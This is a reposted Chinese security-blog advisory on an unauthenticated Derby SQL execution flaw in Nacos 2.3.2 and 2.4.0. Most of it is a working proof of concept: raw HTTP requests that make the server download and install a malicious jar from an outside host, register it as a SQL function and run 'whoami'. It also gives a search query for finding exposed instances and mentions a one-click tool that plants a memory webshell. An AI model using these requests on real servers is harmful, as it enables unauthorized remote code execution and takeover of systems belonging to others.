Nacos Derby Sql注入RCE(常规出网)

admin
admin
admin
138876
文章
114
评论
2024年7月18日13:36:01评论215 views字数 1169阅读3分53秒阅读模式

漏洞描述

Nacos derby存在远程代码执行漏洞,由于Alibaba Nacos部分版本中derby数据库默认可以未授权访问,恶意攻击者利用此漏洞可以未授权执行SQL语句,从而远程加载恶意构造的jar包,最终导致任意代码执行。

影响版本

nacos 2.3.2nacos 2.4.0

 

网络测绘

app="NACOS"

Nacos Derby Sql注入RCE(常规出网)

漏洞Poc

POST /nacos/v1/cs/ops/data/removal HTTP/1.1Host: 10.211.55.6:8848User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Content-Type: multipart/form-data; boundary=ac782d2c643a8b33dc0950fdc87cf06cContent-Length: 501
--ac782d2c643a8b33dc0950fdc87cf06cContent-Disposition: form-data; name="file"; filename="file"
CALL sqlj.install_jar('http://192.168.0.103:5000/download', 'NACOS.GiRyNcWh', 0)
            CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.GiRyNcWh')
            CREATE FUNCTION S_EXAMPLE_GiRyNcWh( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
--ac782d2c643a8b33dc0950fdc87cf06c--

GET /nacos/v1/cs/ops/derby?sql=select+%2A+from+%28select+count%28%2A%29+as+b%2C+S_EXAMPLE_ymLfaFog%28%27whoami%27%29+as+a+from+config_info%29+tmp+%2F%2AROWS+FETCH+NEXT%2A%2F HTTP/1.1Host: 10.211.55.6:8848User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*

漏洞复现

目前已实现工具一键利用(漏洞Check、命令执行、打入内存马)

Nacos Derby Sql注入RCE(常规出网)

原文始发于微信公众号(南街老友):Nacos Derby Sql注入RCE(常规出网)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月18日13:36:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos Derby Sql注入RCE(常规出网)https://cn-sec.com/archives/2968394.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息